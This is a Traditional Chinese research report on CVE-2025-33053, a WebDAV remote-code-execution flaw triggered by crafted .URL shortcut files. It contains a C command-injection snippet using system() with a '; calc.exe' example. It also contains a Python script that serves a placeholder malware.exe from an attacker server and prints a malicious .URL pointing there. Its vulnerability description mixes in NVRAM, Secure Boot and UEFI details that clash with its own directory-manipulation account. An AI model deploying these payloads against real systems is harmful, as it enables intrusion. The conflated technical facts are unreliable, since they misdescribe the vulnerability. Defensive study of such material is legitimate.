1. 引言

遠端程式碼執行（RCE）漏洞是一類嚴重的安全缺陷，允許攻擊者在目標系統上執行任意程式碼。此類危害可能導致嚴重後果，包括資料竊取、系統控制、網路橫向移動，以及持久性惡意軟體的部署。當這些漏洞在實際環境中被積極利用時，其危險性尤為顯著，對使用者和組織構成即時威脅。

本研究報告聚焦於 CVE-2025-33053 ，這是一個影響微軟WebDAV客戶端的重大零日RCE漏洞。其存在及積極利用已被確認，微軟已發布修補程式以應對此問題。由Check Point研究人員Alexandra Gofman和David Driker發現，CVE-2025-33053是第一個公開披露的專門針對WebDAV標準的零日漏洞 [2] 。雖然本報告的初始參考資料為GitHub儲存庫 [1] ，未提供具體細節，但後續資訊確認了此關鍵缺陷的性質。

本報告的主要目標是對CVE-2025-33053進行全面的技術檢視。我們將探討該漏洞的機制，重點分析特製URL檔案如何操縱工作目錄以實現遠端程式碼執行。此外，我們將分析RCE的PoC一般設計原則，展示基於網路的漏洞利用和程式碼執行的常見元素。本報告還將觸及WebDAV運作的架構背景，並以關鍵的緩解策略作結。

2. 了解WebDAV與CVE-2025-33053

Web分散式創作與版本控制（WebDAV）是超文字傳輸協定（HTTP）的擴展，允許客戶端執行遠端網頁內容創作操作。它提供了一個框架，讓使用者能在伺服器上建立、修改和移動文件。WebDAV廣泛整合於作業系統中，允許使用者像操作本地磁碟一樣與遠端共享資源互動。

2.1. CVE-2025-33053：WebDAV RCE漏洞

CVE-2025-33053被分類為具有高CVSS分數8.8的遠端程式碼執行漏洞。其嚴重性因其在現實世界中的積極利用而加劇 [2] 。該漏洞的核心在於“執行時期NVRAM變數的不當處理，啟用了任意寫入原語(Primitive)，能夠修改關鍵韌體結構，包括用於安全啟動驗證(Secure Boot verification)的全球 Security2 Architectural Protocol”，根據CERT/CC的描述 [2] 。更具體地說，對於客戶端攻擊，該漏洞允許通過“工作目錄的操縱”實現遠端程式碼執行，當使用者與特製的網際網路捷徑（URL）檔案互動時 [2] 。

CVE-2025-33053的攻擊向量主要涉及社交工程。攻擊者誘騙使用者點擊惡意的網際網路捷徑（.URL）檔案。該檔案在被有漏洞的WebDAV客戶端處理時，會以某種方式操縱工作目錄，使系統嘗試從攻擊者控制的WebDAV伺服器執行惡意payload。這允許執行任意未簽署的程式碼，甚至可能在作業系統完全載入之前執行，對系統完整性和持久性構成重大風險 [2] 。

3. 攻擊與概念驗證機制的技術分析

要了解CVE-2025-33053的技術細節，需檢視惡意URL檔案如何利用WebDAV客戶端的行為實現RCE。雖然此特定漏洞的確切PoC程式碼可能有所不同，但我們可以概括攻擊過程，並以典型的RCE PoC結構來說明概念，涉及網路互動和程式碼執行。

3.1. 有漏洞的架構互動（概念性）

在CVE-2025-33053的背景下，互動發生在執行有漏洞的WebDAV客戶端的受害者機器與攻擊者控制的WebDAV伺服器之間。

1. 攻擊者控制的WebDAV伺服器： 攻擊者設置一個惡意的WebDAV伺服器，託管攻擊 payload（例如可執行檔案或腳本）。
2. 惡意URL檔案： 攻擊者製作一個網際網路捷徑（.URL）檔案。該檔案包含特殊格式的路徑或指令，當被有漏洞的WebDAV客戶端解析時，會觸發目錄操縱漏洞(Directory manipulation vulnerability)。此URL檔案隨後被傳遞給受害者（例如通過電子郵件、釣魚網站或惡意網站）。
3. 受害者互動： 受害者點擊或以其他方式與惡意.URL檔案互動。
4. 有漏洞的WebDAV客戶端處理： 作業系統的WebDAV客戶端處理.URL檔案。由於漏洞的存在，客戶端對路徑或工作目錄的內部處理被操縱，導致其解析到攻擊者的WebDAV伺服器上的某個位置。
5. Payload執行： 操縱後的目錄環境隨後導致執行託管在攻擊者WebDAV伺服器上的惡意payload。此執行可能以允許系統嚴重受損的權限進行。

3.2. 概念性PoC（概念驗證）元素

雖然CVE-2025-33053的具體PoC涉及精確製作 .url 檔案和惡意WebDAV伺服器設置，但我們可以說明RCE PoC的一般原則。PoC旨在通過可靠觸發漏洞並執行受控的程式碼（shellcode）來展示漏洞。

概念性有漏洞的程式碼片段（展示可能導致RCE的不當輸入處理，與WebDAV客戶端內部無關）：

CVE-2025-33053的根本漏洞被描述為執行時期NVRAM變數的不當處理，但攻擊鏈涉及目錄操縱。為了提供廣泛適用於因不當輸入處理導致RCE的程式碼級示例，考慮一個通用的類C函數，可能在未經適當驗證的情況下處理路徑，導致任意執行。這是一個簡化示例，用以展示不受控制的輸入如何導致關鍵問題，作為特製URL可能帶來危險的概念基礎。

#include <stdio.h>
#include <string.h>
#include <stdlib.h> // For system()
// 假設函數：處理來自不受信任來源的“路徑”
// 這是示例性質，非直接的WebDAV客戶端漏洞程式碼。
void process_path_unsafe(char *user_supplied_path) {
    char command_buffer[512]; // 固定大小的命令緩衝區
    // 在真實的WebDAV RCE中，漏洞會操縱
    // 系統尋找可執行檔案的位置，或
    // 根據惡意URL屬性構建的命令。
    // 此示例模擬路徑未經清理的情況下發生的命令注入。
    // 不良做法：直接將不受信任的輸入納入命令
    // 真實的WebDAV漏洞可能操縱內部檔案路徑解析，
    // 導致無需直接“system()”呼叫即可執行遠端二進位檔案。
    snprintf(command_buffer, sizeof(command_buffer), "explorer.exe \"%s\"", user_supplied_path);
    printf("執行命令：%s\n", command_buffer);
    system(command_buffer); // 有漏洞的：執行command_buffer中的任何內容
}
int main(int argc, char *argv[]) {
    // 模擬來自惡意.URL檔案或網路的使用者提供路徑
    if (argc < 2) {
        printf("用法：%s <惡意路徑或URL內容>\n", argv[0]);
        return 1;
    }
    process_path_unsafe(argv[1]);
    return 0;
}

在此簡化的C示例中，若 user_supplied_path 被製作包含特殊字元或命令（例如 "; calc.exe" ），可能導致任意命令執行。雖然CVE-2025-33053利用特定的WebDAV客戶端解析和目錄操縱，但不受信任的輸入導致意外且惡意執行的基本原則依然適用。

3.3. 概念性Python PoC用於通用RCE

用於展示RCE的Python PoC通常涉及網路通訊和payload傳遞。雖然CVE-2025-33053具體涉及 .url 檔案，但攻擊者端（例如設置惡意WebDAV伺服器或模擬客戶端互動）的PoC仍會使用socket程式設計進行網路服務。以下Python程式碼展示了連接到服務並發送特製payload的通用方法，概念上類似於攻擊者在直接網路連線或提供惡意內容時可能觸發漏洞的方式。

import socket
import sys
import http.server
import socketserver
import threading
# --- 假設目標配置（用於通用RCE PoC展示） ---
# 對於CVE-2025-33053，“目標”是點擊URL的受害者WebDAV客戶端。
# 以下的“伺服器”將是託管payload的惡意WebDAV伺服器。
TARGET_IP = "127.0.0.1" # 表示受害者客戶端連接到攻擊者伺服器的IP
TARGET_PORT = 80        # 標準HTTP/WebDAV通訊埠（攻擊者控制的伺服器）
# --- 假設的exploit payload（shellcode或要執行的命令） ---
# 在CVE-2025-33053中，這將是受害者WebDAV客戶端被誘騙執行的惡意可執行檔案/腳本。
# 此示例使用通用shellcode進行RCE展示。
# 實際payload將是WebDAV伺服器上託管的完整可執行檔案。
SHELLCODE_OR_PAYLOAD_NAME = "malware.exe" # 攻擊者WebDAV伺服器上的檔案名稱
HYPOTHETICAL_SHELLCODE_BYTES = b"\x90" * 20 + b"\xcc" # NOPs + INT3用於斷點/crash
# --- 模擬惡意WebDAV伺服器的函數 ---
# 該伺服器將在請求時提供“malware.exe”檔案。
# 為簡單起見，這是一個基本的HTTP伺服器，但真實的WebDAV伺服器
# 需要更複雜的實現（例如使用wsgidav庫）。
class SimpleWebDAVHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == f"/{SHELLCODE_OR_PAYLOAD_NAME}":
            self.send_response(200)
            self.send_header("Content-type", "application/octet-stream")
            self.end_headers()
            self.wfile.write(b"MZ" + HYPOTHETICAL_SHELLCODE_BYTES + b"This is a placeholder for actual malware.exe")
            print(f"[+] 已提供惡意payload：{SHELLCODE_OR_PAYLOAD_NAME}")
        else:
            super().do_GET() # 正常提供其他檔案（例如.URL檔案本身若託管）
    def log_message(self, format, *args):
        # 在此簡化示例中抑制日誌以保持輸出乾淨
        pass
def run_malicious_webdav_server(port):
    with socketserver.TCPServer(("", port), SimpleWebDAVHandler) as httpd:
        print(f"[+] 惡意WebDAV (HTTP)伺服器運行於通訊埠{port}...")
        httpd.serve_forever()
# --- 主PoC邏輯 ---
if __name__ == "__main__":
    # 在獨立執行緒中啟動惡意WebDAV伺服器
    server_thread = threading.Thread(target=run_malicious_webdav_server, args=(TARGET_PORT,))
    server_thread.daemon = True # 允許主程式即使伺服器運行中也能退出
    server_thread.start()
    print(f"[*] 攻擊者設置完成。指示使用者點擊特製的.URL檔案。")
    print(f"    示例惡意.URL內容（概念性）：")
    print(f"    [InternetShortcut]")
    print(f"    URL=http://{TARGET_IP}:{TARGET_PORT}/malware.exe/../malware.exe") # 路徑穿越或目錄操縱示例
    print(f"    WorkingDirectory=http://{TARGET_IP}:{TARGET_PORT}/malicious_dir/") # 工作目錄操縱示例
    print(f"    IconFile=http://{TARGET_IP}:{TARGET_PORT}/malicious_icon.ico") # 也可能通過圖標檔案傳遞payload
    # 在真實場景中，攻擊者等待受害者的連線
    # 並監控伺服器日誌以檢查payload請求。
    print("[*] 等待受害者觸發漏洞...")
    print("[*] 按Ctrl+C停止伺服器。")
    try:
        while True:
            threading.Event().wait(1) # 保持主執行緒存活
    except KeyboardInterrupt:
        print("\n[-] 伺服器已停止。")
        sys.exit(0)

上述Python腳本概念性地概述了攻擊者如何設置惡意WebDAV（或HTTP）伺服器以提供payload，以及 .url 檔案如何結構化以指向該伺服器。 SHELLCODE_OR_PAYLOAD_NAME 將是受害者WebDAV客戶端因目錄操縱而被誘騙下載並執行的實際惡意可執行檔案。 SimpleWebDAVHandler 展示了伺服器端，提供一個通用占位符可執行檔案。 print 語句展示了利用工作目錄操縱的惡意 .url 檔案的概念性內容。

3.4. CVE-2025-33053攻擊過程中的執行流程

CVE-2025-33053的攻擊遵循以下一般步驟：

1. 傳遞惡意URL： 攻擊者向受害者傳遞特製的 .url 檔案。這可能通過電子郵件、即時訊息或託管在受損網站上進行。
2. 使用者互動： 受害者點擊 .url 檔案。作業系統的WebDAV客戶端（或相關組件）開始解析此檔案。
3. 目錄操縱： 特製的 .url 檔案，可能通過特定的路徑穿越技術或對 WorkingDirectory 屬性的不當處理，利用漏洞誘騙WebDAV客戶端。客戶端的內部工作目錄被操縱，指向攻擊者控制的WebDAV伺服器，而非解析到無害的位置。
4. 遠端程式碼執行： 一旦工作目錄被操縱，系統嘗試執行一個檔案（例如 malware.exe ），該檔案現在被認為位於操縱後的攻擊者控制目錄中。這導致從惡意WebDAV伺服器下載並執行攻擊者的payload。
5. 系統受損： 執行後的payload隨後實現攻擊者的目標，例如建立持久性、安裝後門或竊取資料。由於受影響的應用程式由微軟UEFI憑證授權機構簽署，此漏洞可能允許未簽署的程式碼在啟動過程中執行，啟用高度持久性的惡意軟體。

4. 影響與緩解

CVE-2025-33053的成功攻擊帶來嚴重後果。作為RCE，它授予攻擊者對受損系統的完全控制，可能導致：

• 完整系統受損： 攻擊者可安裝rootkit、後門和其他持久性惡意軟體。
• 資料外洩： 系統上儲存的敏感資訊可能被竊取。
• 橫向移動： 受損系統可用作攻擊網路內其他系統的支點。
• 運營中斷： 在企業環境中，受損系統可能干擾業務運營。
• 韌體操縱： 該漏洞與NVRAM和安全啟動協定的互動引發了對啟動過程本身受損的擔憂，導致高度隱秘且具韌性的惡意軟體 [2] 。

針對CVE-2025-33053及類似的WebDAV相關威脅，有效的緩解措施包括多方面方法：

• 及時修補： 最直接且關鍵的緩解措施是應用微軟於2025年6月修補程式星期二發布的安全修補程式，解決CVE-2025-33053 [2] 。
• 使用者教育： 教育使用者關於點擊可疑連結或開啟未經請求的檔案（特別是帶有 .url 副檔名的檔案）的危險。實施強大的電子郵件過濾以阻止惡意附件。
• 網路分段與出口過濾： 限制內部網路的出站連線，防止受損系統與攻擊者控制的C2伺服器通訊。
• 端點偵測與回應（EDR）： 部署EDR解決方案以偵測並回應可疑活動，例如不尋常的程序創建或WebDAV客戶端發起的網路連線。
• 應用程式白名單： 實施應用程式白名單政策，防止未經授權的可執行檔案執行，特別是從臨時目錄或網路共享執行。
• 停用不必要的協定： 若業務運營無需WebDAV，考慮在端點上停用WebDAV客戶端或限制其功能僅限於可信任的伺服器。
• 安全啟動與UEFI強化： 確保系統利用安全啟動，且UEFI韌體定期更新並安全設定，因為該漏洞可能影響這些領域。

5. 結論

CVE-2025-33053是一個鮮明的提醒，遠端程式碼執行漏洞的持續威脅，特別是那些在實際環境被積極利用的漏洞。這個WebDAV RCE通過特製URL檔案操縱工作目錄，展示了看似無害的檔案類型如何被武器化以實現深層系統受損。我們的技術分析概述了概念性攻擊鏈，包括攻擊者控制的WebDAV伺服器和惡意payload執行的角色。通用RCE PoC的整合展示了此類漏洞的底層程式設計概念。鑑於CVE-2025-33053的嚴重性和積極利用，及時修補和多層次防禦策略，包括使用者教育、網路安全和端點保護，至關重要，以保護系統免受此關鍵漏洞的侵害。了解這些機制對於網路安全專業人員開發針對不斷演變威脅的強大防禦至關重要。

6. 參考資料

1. [1] DevBuiHieu. (2025). CVE-2025-33053-Proof-Of-Concept. GitHub.
2. [2] Lakshmanan, R. (2025, June 11). Microsoft Patches 67 Vulnerabilities Including WEBDAV Zero-Day Exploited in the Wild. The Hacker News.